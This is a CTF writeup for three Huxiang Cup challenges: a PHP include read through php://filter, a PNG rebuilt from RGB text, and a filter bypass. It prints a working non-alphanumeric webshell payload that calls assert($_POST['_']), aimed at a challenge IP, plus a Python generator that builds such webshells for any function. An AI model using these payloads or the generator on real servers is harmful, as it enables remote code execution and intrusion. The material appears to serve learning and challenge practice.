0x00 Preface
As a novice I only managed to squeeze out a little time for this year's 湖湘杯 (Huxiang Cup). I looked at the challenges near the end of the event and solved three of them; here is the writeup.
0x01 Challenge 1: web200
At first the challenge looked like a file-upload problem, but several upload tricks went nowhere. Clicking around, I noticed the op parameter in the URL, which smelled like a PHP file inclusion.
A quick test confirmed it and yielded the source of index.php.
0x02 Reading the source with php://filter
When pulling source through the php://filter wrapper, note that "resource=index" must carry no .php suffix. The index.php source below confirms why: the suffix is appended by the server when it concatenates the parameter (include $op . '.php'), so resource=index.php would try to include index.php.php and fail.
<?php
error_reporting(0);
define('FROM_INDEX', 1);
// Page to include; defaults to "home".
$op = empty($_GET['op']) ? 'home' : $_GET['op'];
// The only guard: $op must be a string and must not contain "..".
// This blocks directory traversal, but a stream wrapper such as php://filter
// contains no ".." and passes straight through.
if(!is_string($op) || preg_match('/\.\./', $op))
    die('Try it again and I will kill you! I freaking hate hackers!');
ob_start('ob_gzhandler');
function page_top($op) {
?><!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Panduploader::<?= htmlentities(ucfirst($op)); ?></title>
</head>
<body>
<div id="header">
<center><a href="?op=home" class="logo"><img src="images/logo.jpg" alt=""></a></center>
</div>
<div id="body">
<?php
}
function fatal($msg) {
?><div class="article">
<h2>Error</h2>
<p><?=$msg;?></p>
</div><?php
    exit(1);
}
function page_bottom() {
?>
</div>
<center>
<div id="footer">
<div>
<p>
<span>2017 © </span> All rights reserved.
</p>
</div>
</div>
</center>
</body>
</html><?php
    ob_end_flush();
}
register_shutdown_function('page_bottom');
page_top($op);
// The ".php" suffix is appended here, which is why the filter resource
// is "index", not "index.php".
if(!(include $op . '.php'))
    fatal('no such page');
?>
0x03 Getting the flag
Requesting op=flag showed that flag.php exists, so read its source through the same filter and base64-decode the output to get the flag:
http://114.215.129.72:10080/?op=php://filter/read=convert.base64-encode/resource=flag
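To make both halves of this bug concrete, here is an added Python example (mine, not part of the original writeup or the challenge). It mirrors the op check from the index.php source above, puts an allowlist check beside it, builds the php://filter op value, and decodes the base64 that the wrapper leaves in the page. The response HTML, the page names in the allowlist and the flag.php contents are constructed for the example.

```python
import base64
import gzip
import re

# Model of the check in the challenge's index.php: only is_string() and a ".."
# regex guard $op before `include $op . '.php'`.  Constructed here for illustration.
def challenge_op_allowed(op):
    """Mirror of the original filter: blocks traversal, but not stream wrappers."""
    return isinstance(op, str) and re.search(r"\.\.", op) is None

# Hardened variant (added here, not from the challenge): an allowlist of page names.
PAGES = frozenset({"home", "upload"})   # assumed page set for the example

def hardened_op_allowed(op, pages=PAGES):
    """Accept only a known page name made of lowercase letters."""
    return isinstance(op, str) and re.fullmatch(r"[a-z]+", op) is not None and op in pages

def filter_read_op(resource):
    """op value that makes `include $op . '.php'` emit a file's source as base64.
    Pass the name without '.php': the server appends the suffix itself."""
    return "php://filter/read=convert.base64-encode/resource=" + resource

def decode_filter_output(body):
    """Pull the base64 run the filter wrapper leaves in the HTML and decode it.
    ob_gzhandler gzips the body for clients that advertise it, so undo that first."""
    if isinstance(body, bytes) and body[:2] == b"\x1f\x8b":
        body = gzip.decompress(body)
    if isinstance(body, bytes):
        body = body.decode("latin-1")
    runs = re.findall(r"[A-Za-z0-9+/]{16,}={0,2}", body)
    if not runs:
        raise ValueError("no base64 blob in the response")
    return base64.b64decode(max(runs, key=len)).decode("utf-8", "replace")

# Constructed response: what the page looks like after including the wrapper.
FLAG_SOURCE = b"<?php\n$flag = 'flag{constructed_example}';\n"
SAMPLE_RESPONSE = ("<html><head><title>Panduploader::Flag</title></head><body>"
                   + base64.b64encode(FLAG_SOURCE).decode()
                   + "<p>2017 &copy; All rights reserved.</p></body></html>")
SAMPLE_RESPONSE_GZ = gzip.compress(SAMPLE_RESPONSE.encode())   # as ob_gzhandler would send it

if __name__ == "__main__":
    op = filter_read_op("flag")
    print("challenge check lets it through:", challenge_op_allowed(op))
    print("allowlist check lets it through:", hardened_op_allowed(op))
    print(decode_filter_output(SAMPLE_RESPONSE_GZ))
```

The allowlist is the fix a reviewer would ask for: the ".." regex only addresses traversal, while the real problem is that $op is a free-form string fed to include.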
0x04 Challenge 2: MISC traffic analysis
Looking through the HTTP streams shows a flag.zip being transferred.
Follow the TCP stream, copy the hex of flag.zip into WinHex and save it as flag.zip.
Unzipping it gives a single ce.txt.
At first glance it looked like a QR code and I spent a long time on that without result; it turned out to be a PNG stored as one RGB triplet per line.
cat -n ce.txt | tail -n 1
98457 254, 255, 255
So there are 98457 lines, one per pixel. 98457 = 3 × 37 × 887, so the only plausible dimensions are 887×111 or 2661×37 (or their transposes). Flags in images like this are usually one long strip of text, so I tried 887×111 first.
Generate the PNG with this script:
#! /usr/bin/python2.7
from PIL import Image

x = 887   # width
y = 111   # height
im = Image.new('RGB', (x, y))
# One "r, g, b" line per pixel. The image is filled column by column,
# so line number i*y + j becomes pixel (i, j).
with open('ce.txt') as f:
    for i in range(0, x):
        for j in range(0, y):
            lst = f.readline().split(',')
            im.putpixel((i, j), (int(lst[0]), int(lst[1]), int(lst[2])))
im.show()
im.save('flag.png')
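As an added example (mine, not the original script), here is the same reconstruction without PIL: it parses the triplet file, enumerates every plausible width × height for the line count, and writes each candidate as a PNG using only the standard library, so you can try all of them rather than guessing one. The 3×2 sample lines are constructed; pass the real ce.txt as the first argument.

```python
import struct
import zlib

def parse_rgb_lines(text):
    """Parse lines like '254, 255, 255' into (r, g, b) tuples; blank lines are skipped."""
    pixels = []
    for line in text.splitlines():
        if line.strip():
            r, g, b = (int(v) for v in line.split(","))
            pixels.append((r, g, b))
    return pixels

def candidate_dims(count, min_side=8):
    """(width, height) pairs with width * height == count, widest first.
    Very thin sides are skipped since they cannot hold readable text."""
    dims = []
    for h in range(min_side, int(count ** 0.5) + 1):
        if count % h == 0 and count // h >= min_side:
            dims.append((count // h, h))
    return dims

def to_png(pixels, width, height, column_major=True):
    """Encode the pixels as an 8-bit RGB PNG with the standard library only.
    column_major=True matches the writeup's script: pixel (x, y) is line x*height + y."""
    if len(pixels) != width * height:
        raise ValueError("pixel count %d != %dx%d" % (len(pixels), width, height))
    raw = bytearray()
    for y in range(height):
        raw.append(0)                       # filter type 0 (None) for this scanline
        for x in range(width):
            raw += bytes(pixels[x * height + y] if column_major else pixels[y * width + x])

    def chunk(tag, data):
        body = tag + data
        return struct.pack(">I", len(data)) + body + struct.pack(">I", zlib.crc32(body) & 0xFFFFFFFF)

    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)   # 8 bits/sample, type 2 = RGB
    return (b"\x89PNG\r\n\x1a\n" + chunk(b"IHDR", ihdr)
            + chunk(b"IDAT", zlib.compress(bytes(raw))) + chunk(b"IEND", b""))

def png_info(data):
    """Parse a PNG back: (width, height, decompressed scanline bytes), to sanity-check output."""
    if data[:8] != b"\x89PNG\r\n\x1a\n":
        raise ValueError("not a PNG")
    pos, width, height, idat = 8, None, None, b""
    while pos < len(data):
        length, = struct.unpack(">I", data[pos:pos + 4])
        tag, body = data[pos + 4:pos + 8], data[pos + 8:pos + 8 + length]
        if tag == b"IHDR":
            width, height = struct.unpack(">II", body[:8])
        elif tag == b"IDAT":
            idat += body
        pos += 12 + length
    return width, height, zlib.decompress(idat)

# Constructed 3x2 input in the same "r, g, b" per-line format as ce.txt.
SAMPLE_LINES = "255, 0, 0\n0, 255, 0\n0, 0, 255\n10, 20, 30\n40, 50, 60\n70, 80, 90\n"

if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LINES
    px = parse_rgb_lines(text)
    for w, h in candidate_dims(len(px), min_side=8 if len(sys.argv) > 1 else 2):
        name = "out_%dx%d.png" % (w, h)
        with open(name, "wb") as out:
            out.write(to_png(px, w, h))
        print("wrote", name, "size", png_info(open(name, "rb").read())[:2])
```

For ce.txt this produces out_2661x37.png and out_887x111.png; if neither reads, flip column_major, since the dump may be row-major instead.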
0x05 Challenge 3: web300
Testing showed that letters, digits and a number of symbols are filtered, and we need to get a webshell through anyway.
p牛's article describes a webshell built entirely from non-alphanumeric characters: PHP's type juggling turns an empty string into an array, the array into the string "Array", and its first character 'A' is then incremented with ++ to spell out the function and variable names.
Payload
http://114.215.133.202:10080/?content=$_=%27%27;$_[%2b$_]%2b%2b;$_=$_.%27%27;$__=$_[%2b%27%27];$_=$__;$___=$_;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$____=%27_%27;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$_=$$____;$___($_[_]);
Connect with 菜刀 (China Chopper); the password is "_", because the payload decodes to ASSERT($_POST[_]).
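To see what that wall of $__++ actually does, here is an added Python example (mine, not from p牛's article or the original writeup). php_inc emulates PHP's string increment, build_payload generates a non-alphanumeric webshell for any uppercase function name and superglobal using the same trick, and decode_payload evaluates the small PHP subset these payloads use and returns the resulting call as text. Feeding it the query string from the page (the part after content=) decodes to ASSERT($_POST['_']), which is why the 菜刀 password is "_". The bootstrap relies on an empty string silently becoming an array on an offset write, which I assume holds on PHP 5 through 7.0 as the challenge required.

```python
import re
from urllib.parse import quote, unquote

# Bootstrap from the technique: ''[0]++ turns $_ into array(1) (assumed behaviour of
# PHP 5.x/7.0), array . '' is the string "Array", and "Array"[0] is 'A'.
BOOTSTRAP = "$_='';$_[+$_]++;$_=$_.'';$__=$_[+''];$_=$__;"

def php_inc(s):
    """Emulate PHP's ++ on a string: 'A'->'B', 'Z'->'AA', 'Az'->'Ba', 'a9'->'b0'."""
    if s == "":
        return "1"
    chars = list(s)
    for i in range(len(chars) - 1, -1, -1):
        c = chars[i]
        if c in "zZ9":                       # wrap this position and carry leftwards
            chars[i] = {"z": "a", "Z": "A", "9": "0"}[c]
        elif "a" <= c < "z" or "A" <= c < "Z" or "0" <= c < "9":
            chars[i] = chr(ord(c) + 1)
            return "".join(chars)
        else:                                # PHP stops at a non-alphanumeric character
            return "".join(chars)
    lead = s[0]                              # carried off the left edge: grow the string
    return ("1" if lead.isdigit() else "a" if lead.islower() else "A") + "".join(chars)

def build_string(var, text):
    """Statements that assemble `text` (A-Z and '_' only) in $var, starting from $_ == 'A'."""
    stmts = ["$%s='';" % var]
    for c in text:
        if c == "_":
            stmts.append("$%s.='_';" % var)
        elif "A" <= c <= "Z":
            stmts.append("$__=$_;" + "$__++;" * (ord(c) - ord("A")) + "$%s.=$__;" % var)
        else:
            raise ValueError("cannot build %r from 'A' with ++" % c)
    return "".join(stmts)

def build_payload(func="ASSERT", source="_POST"):
    """Whole non-alphanumeric webshell calling func($source['_']); assert($_POST['_']) by default."""
    return BOOTSTRAP + build_string("___", func) + build_string("____", source) + "$_=$$____;$___($_[_]);"

def is_alnum_free(payload):
    """True when the raw payload contains no letters or digits (what the web300 filter demands)."""
    return re.search(r"[A-Za-z0-9]", payload) is None

def url_encode(payload):
    """Percent-encode everything non-alphanumeric: a bare '+' in a query string becomes a space."""
    return quote(payload, safe="")

def php_str(v):
    """PHP string conversion for the two value kinds the payload produces."""
    return "Array" if isinstance(v, list) else v

def decode_payload(payload):
    """Evaluate the PHP subset these payloads use and return the final call as readable text."""
    env = {}
    put = env.__setitem__
    rules = [
        (r"\$(\w+)='([^']*)'",        lambda m: put(m[1], m[2])),
        (r"\$(\w+)\.='([^']*)'",      lambda m: put(m[1], php_str(env[m[1]]) + m[2])),
        (r"\$(\w+)\[\+\$\w+\]\+\+",   lambda m: put(m[1], [1])),                   # ''[0]++ -> array(1)
        (r"\$(\w+)=\$(\w+)\.''",      lambda m: put(m[1], php_str(env[m[2]]))),    # array . '' -> 'Array'
        (r"\$(\w+)=\$(\w+)\[\+''\]",  lambda m: put(m[1], php_str(env[m[2]])[0])), # 'Array'[0] -> 'A'
        (r"\$(\w+)=\$\$(\w+)",        lambda m: put(m[1], "$" + env[m[2]])),       # $$x -> superglobal
        (r"\$(\w+)=\$(\w+)",          lambda m: put(m[1], env[m[2]])),
        (r"\$(\w+)\+\+",              lambda m: put(m[1], php_inc(env[m[1]]))),
        (r"\$(\w+)\.=\$(\w+)",        lambda m: put(m[1], php_str(env[m[1]]) + php_str(env[m[2]]))),
    ]
    for stmt in filter(None, unquote(payload).split(";")):
        call = re.fullmatch(r"\$(\w+)\(\$(\w+)\[(\w+)\]\)", stmt)
        if call:
            return "%s(%s['%s'])" % (env[call[1]], env[call[2]], call[3])
        for pattern, action in rules:
            m = re.fullmatch(pattern, stmt)
            if m:
                action(m)
                break
        else:
            raise ValueError("unsupported statement: " + stmt)
    raise ValueError("payload never calls a function")

if __name__ == "__main__":
    shell = build_payload()
    print(url_encode(shell))
    print(decode_payload(shell))
```

Two practical notes: send the payload with '+' percent-encoded (as the page's URL does with %2b), since a raw '+' in a query string is decoded as a space and the ++ operators vanish; and the generator is limited to uppercase names and '_' because every character is reached from 'A' by incrementing, which is also why the page spells ASSERT and _POST in capitals (PHP function names are case-insensitive, so ASSERT works).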